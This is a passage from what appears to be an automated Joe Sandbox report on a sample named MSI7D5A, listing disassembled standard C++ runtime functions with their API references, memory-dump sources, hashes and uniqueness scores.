                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 9a7a1bc45dd734c21b7e527ff9107c2f9f309c49d2fcc635c65d628f39dbb666
                                                      • Instruction ID: f5edf0c39feebb6235c3654adc526c81f2e635ca1748df5337f7a54005b259da
                                                      • Opcode Fuzzy Hash: 9a7a1bc45dd734c21b7e527ff9107c2f9f309c49d2fcc635c65d628f39dbb666
                                                      • Instruction Fuzzy Hash: 7F01D236900125DBCB19FBA4DA42ABEB7B5BF80711F240809FD106B292CF749E09C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5EA02 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EA09
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EA13
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5EA64
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5EA84
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: b2f987e70d2010e9c7322f8f01e421f1d4df801c9f02f3c69d018b8f3fef53bf
                                                      • Instruction ID: f681766fa9258161694f49a5fea985059e9d10a9f84af546d79aa0fda5aec186
                                                      • Opcode Fuzzy Hash: b2f987e70d2010e9c7322f8f01e421f1d4df801c9f02f3c69d018b8f3fef53bf
                                                      • Instruction Fuzzy Hash: E001D2369002159FCF18FBB4DA41AAE77B1BF94722F250809F9016B291DF749E498791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52BB5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52BBC
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52BC6
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52C17
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52C37
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 4a0d0c76f22ae2607f3463737d86ca2314e9d8651d79e8fa4bf30811b93f424d
                                                      • Instruction ID: aa08597a95ce1dda69515de48d1f15d2a55e2e3583cdfad573d5f494bb590429
                                                      • Opcode Fuzzy Hash: 4a0d0c76f22ae2607f3463737d86ca2314e9d8651d79e8fa4bf30811b93f424d
                                                      • Instruction Fuzzy Hash: 5601D236901119DBCF14FBA4EA41AAE77B1BF90711F244849FC006B292DF749E09CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5EBC1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EBC8
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EBD2
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5EC23
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5EC43
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: b54ef48631019316c36136dfbfdb8b11a5b3c1ad491d87af6ac6d7e96fcdb0fb
                                                      • Instruction ID: 92272bfef465eef7ff7d4d002f4f523f800e7d0d7eec2de528f017fe2218c5a7
                                                      • Opcode Fuzzy Hash: b54ef48631019316c36136dfbfdb8b11a5b3c1ad491d87af6ac6d7e96fcdb0fb
                                                      • Instruction Fuzzy Hash: C301D236A00115DFCB18FBA4DA46ABE77B1BF90722F240849F814AB2D1DF74DE098791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52CDF Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52CE6
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52CF0
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52D41
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52D61
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 589e4d0ff8af636d1b95a58ef43b9e057153c211566eb070b3def56edbc8f094
                                                      • Instruction ID: 6e2e16f2b360274ae905964adaaa69003fa98a4f3fbedb6f64aae372eb568757
                                                      • Opcode Fuzzy Hash: 589e4d0ff8af636d1b95a58ef43b9e057153c211566eb070b3def56edbc8f094
                                                      • Instruction Fuzzy Hash: A501C036A001199BCF15FBA4DA41AAE77B1BF94721F240509F81067292DF749E0A8791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52C4A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52C51
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52C5B
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52CAC
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52CCC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 796a3920f3afd1a514198a185c503e48df2d1ad770f7d31b6306c91df6ee989f
                                                      • Instruction ID: a775aeb581073f15065c06fefd6c5fab66e9348f29f61cd4805a3b53fb51fbd9
                                                      • Opcode Fuzzy Hash: 796a3920f3afd1a514198a185c503e48df2d1ad770f7d31b6306c91df6ee989f
                                                      • Instruction Fuzzy Hash: 7501C036901119DBCB14FBA49A41ABEB7B1BFC4711F240409F8116B392CF749E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5EC56 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5EC5D
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A5EC67
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A5ECB8
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A5ECD8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 9042d5ef512ca642405ae3da7efbeaf3e81c7c2819babecd90b7150ea0a885b0
                                                      • Instruction ID: a7e251540418bb99dce941811f7e159d2b119c15c9752baf641a75b2c1a7a3dd
                                                      • Opcode Fuzzy Hash: 9042d5ef512ca642405ae3da7efbeaf3e81c7c2819babecd90b7150ea0a885b0
                                                      • Instruction Fuzzy Hash: D001DE36E00119DFCB09FBA4DA45AAE77B1BF80721F240409F801AB291DF74DE4ACB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52E9E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52EA5
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52EAF
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52F00
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52F20
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 7305a54e4c530440c2d8db557fbcafa78cee28f31b2c9824f8ffa5f7b8a39c2b
                                                      • Instruction ID: cd93a2c9956bf71a786bf12b1deb4ecad97064805e28ab88bb676c93c63b4eae
                                                      • Opcode Fuzzy Hash: 7305a54e4c530440c2d8db557fbcafa78cee28f31b2c9824f8ffa5f7b8a39c2b
                                                      • Instruction Fuzzy Hash: AE01D2369001299BCB05FBA4EA41ABE77B1BF85711F240809FC1067291CF749E09CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52E09 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52E10
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52E1A
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52E6B
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52E8B
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: b441db1f8785a3b8194dddc8c50b33feb2aa3a803941383fb549e4ea00c4d37b
                                                      • Instruction ID: 85a28385c5f7f0cf5048d052bc44d5e4ee44e472c7cec4c77f54ba673c83cda5
                                                      • Opcode Fuzzy Hash: b441db1f8785a3b8194dddc8c50b33feb2aa3a803941383fb549e4ea00c4d37b
                                                      • Instruction Fuzzy Hash: 7801F136900119DFCB14FBA4DA42ABEBBB1BF95721F240909FD106B291DF749E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A52F33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A52F3A
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A52F44
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • std::_Facet_Register.LIBCPMT ref: 00A52F95
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00A52FB5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                      • String ID:
                                                      • API String ID: 2854358121-0
                                                      • Opcode ID: 9ae36a4418c8f873bab36db761000f396ed088f568b31e68304b8f71d259d09b
                                                      • Instruction ID: e2efe1e7748cfa6a422ff5786954e15a69102be20b9ebbda88886bdf66cea3bd
                                                      • Opcode Fuzzy Hash: 9ae36a4418c8f873bab36db761000f396ed088f568b31e68304b8f71d259d09b
                                                      • Instruction Fuzzy Hash: 5201D236900115DFCB14FBA4EA41BBEB7B1BF94721F240409F8006B292DF749E498B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A83686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00A83053,?,00000001,?,?,?,00A82198,?,?,00000000), ref: 00A8369D
                                                      • GetLastError.KERNEL32(?,00A83053,?,00000001,?,?,?,00A82198,?,?,00000000,?,?,?,00A8271F,?), ref: 00A836A9
                                                        • Part of subcall function 00A8366F: CloseHandle.KERNEL32(FFFFFFFE,00A836B9,?,00A83053,?,00000001,?,?,?,00A82198,?,?,00000000,?,?), ref: 00A8367F
                                                      • ___initconout.LIBCMT ref: 00A836B9
                                                        • Part of subcall function 00A83631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A83660,00A83040,?,?,00A82198,?,?,00000000,?), ref: 00A83644
                                                      • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00A83053,?,00000001,?,?,?,00A82198,?,?,00000000,?), ref: 00A836CE
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: 8dcb2e67d334682400efa55566d42a953a8ffac72a3eb282cbd4d79a01b42d31
                                                      • Instruction ID: a6e007cb0bc1751cedcd8d4a6baad21eec106527293c9329685d9e0c19386fc5
                                                      • Opcode Fuzzy Hash: 8dcb2e67d334682400efa55566d42a953a8ffac72a3eb282cbd4d79a01b42d31
                                                      • Instruction Fuzzy Hash: 6CF03037504158BBCF62AFD9DC0899E3F66FB087B1B504160FE199A630DA32C921EB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A62D20 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SleepConditionVariableCS.KERNELBASE(?,00A62CBD,00000064), ref: 00A62D43
                                                      • LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A62CBD,00000064,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62D4D
                                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00A62CBD,00000064,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62D5E
                                                      • EnterCriticalSection.KERNEL32(00A9DD3C,?,00A62CBD,00000064,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62D65
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                      • String ID:
                                                      • API String ID: 3269011525-0
                                                      • Opcode ID: 6572ad30fb9461b8ce05ed111051e8aa93e52ad03c9bacafeeec5cd3cf78e9d9
                                                      • Instruction ID: 8818c916cc93985c7f6a4334ec2239f8facb2b9fd904d6df39f6e7bdef063ee3
                                                      • Opcode Fuzzy Hash: 6572ad30fb9461b8ce05ed111051e8aa93e52ad03c9bacafeeec5cd3cf78e9d9
                                                      • Instruction Fuzzy Hash: AEE0DF32706524FBCF126BC0EC08A8EBF39FF08B20F100411F9096A171CF608A828BD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A4EC87 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A4EC8E
                                                        • Part of subcall function 00A4D87C: __EH_prolog3.LIBCMT ref: 00A4D883
                                                        • Part of subcall function 00A4D87C: std::_Lockit::_Lockit.LIBCPMT ref: 00A4D88D
                                                        • Part of subcall function 00A4D87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4D8FE
                                                      • _Find_elem.LIBCPMT ref: 00A4EE8A
                                                      Strings
                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00A4ECF6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                      • API String ID: 2544715827-2799312399
                                                      • Opcode ID: 443169c97151d6078239d40411141fa65f6a5ec53ff780d2fcc1e70b9615a869
                                                      • Instruction ID: 0ce97ccc7ba4290b7f3c66df3af717107fc693175143e9287b55740266011878
                                                      • Opcode Fuzzy Hash: 443169c97151d6078239d40411141fa65f6a5ec53ff780d2fcc1e70b9615a869
                                                      • Instruction Fuzzy Hash: 43C19738E042889FDF15DFA8C5517ECBBB2BF95300F244059E8956B247D7359D4ACB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A562BE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A562C8
                                                        • Part of subcall function 00A52D74: __EH_prolog3.LIBCMT ref: 00A52D7B
                                                        • Part of subcall function 00A52D74: std::_Lockit::_Lockit.LIBCPMT ref: 00A52D85
                                                        • Part of subcall function 00A52D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00A52DF6
                                                      • _Find_elem.LIBCPMT ref: 00A56502
                                                      Strings
                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00A5633F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                      • API String ID: 2544715827-2799312399
                                                      • Opcode ID: b5c27e0309e89593175bcc33fb95bccf24b4dc27236b69a3b2e4dc603eb02848
                                                      • Instruction ID: cee584c31a046d4da939edc289d9402d34f0eb3669c373e4aba934c6e70e53f0
                                                      • Opcode Fuzzy Hash: b5c27e0309e89593175bcc33fb95bccf24b4dc27236b69a3b2e4dc603eb02848
                                                      • Instruction Fuzzy Hash: 55C19270E042588BDF25DF64C9417ECBBB2BF51316F948099EC89AB286DB349D8DCB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A56694 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 316COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5669E
                                                        • Part of subcall function 00A4B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00A4B8DD
                                                        • Part of subcall function 00A4B8B0: std::_Lockit::_Lockit.LIBCPMT ref: 00A4B900
                                                        • Part of subcall function 00A4B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B928
                                                        • Part of subcall function 00A4B8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4B9B7
                                                      • _Find_elem.LIBCPMT ref: 00A568D8
                                                      Strings
                                                      • 0123456789ABCDEFabcdef-+Xx, xrefs: 00A56715
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
